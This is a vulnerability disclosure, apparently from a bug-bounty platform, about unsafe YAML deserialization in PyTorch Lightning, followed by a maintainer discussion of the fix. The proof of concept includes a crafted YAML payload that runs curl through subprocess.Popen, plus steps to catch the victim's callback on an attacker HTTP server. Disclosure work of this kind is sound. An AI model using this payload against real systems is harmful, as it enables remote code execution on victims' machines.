Deserialization of Untrusted Data in pytorchlightning/pytorch-lightning


Reported on

Dec 12th 2021


There is untrusted YAML Deserialization vulnerability on PyTorchLightning Github repository. PyTorchLightning's (core.saving.load_hparams_from_yaml) functionality is calling "yaml.UnsafeLoader" from pyyaml Python library which is not secure method. Because of that, maliciously crafted yaml config file can cause code execution on the victim's machine.

Proof of Concept

  • Here is the file:
from pytorch_lightning import core
  • Here is the evil.yaml file:
- !!python/object/new:yaml.MappingNode
  listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", ""]]'
    tag: !!str dummy
    value: !!str dummy
    extend: !!python/name:yaml.unsafe_load
  • After that, you need to start HTTP server on your attacker machine's port 8080. When you run the below command, you will see the HTTP request from the victim host because of the malicious yaml file.
python3 -m http.server 8080
  • Run the file after that you will see HTTP request from coming the victim host,


Maliciously crafted yaml config file can cause code execution on the victim's machine.


We are processing your report and will contact the pytorchlightning/pytorch-lightning team within 24 hours. a year ago
We created a GitHub Issue asking the maintainers to create a a year ago
Carlos Mocholí validated this vulnerability a year ago
oivrip has been awarded the disclosure bounty
The fix bounty is now up for grabs
Carlos Mocholí
a year ago


As mentioned in the reference link, is the fix just updating to >=5.3.1?

a year ago


Actually, I don't have very deep knowledge about the pyyaml library, but I would recommend you to update the library to the latest version rather than the 5.3.1 version because as you can see from this link, it is said that there may be some problems in the 5.3.1 version. In addition, the use of UnsafeLoder may also open the door to different deserilization vulnerabilities in the future. For this reason, I can recommend you to examine other pyyaml loader functions such as FullLoader and SafeLoader. As the name suggests, if your application will not cause any incompatibility problems, using "yaml.SafeLoader" after updating the pyyaml library seems like the most guaranteed solution.

a year ago


Another reference about this subject:

Carlos Mocholí
a year ago


Okay, thank you! Do you want to open a PR so you get the fix bounty?

a year ago


Thank you for your offer! You can open a PR.

Carlos Mocholí marked this as fixed in 1.6 with commit 62f1e8 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE has been validated
to join this conversation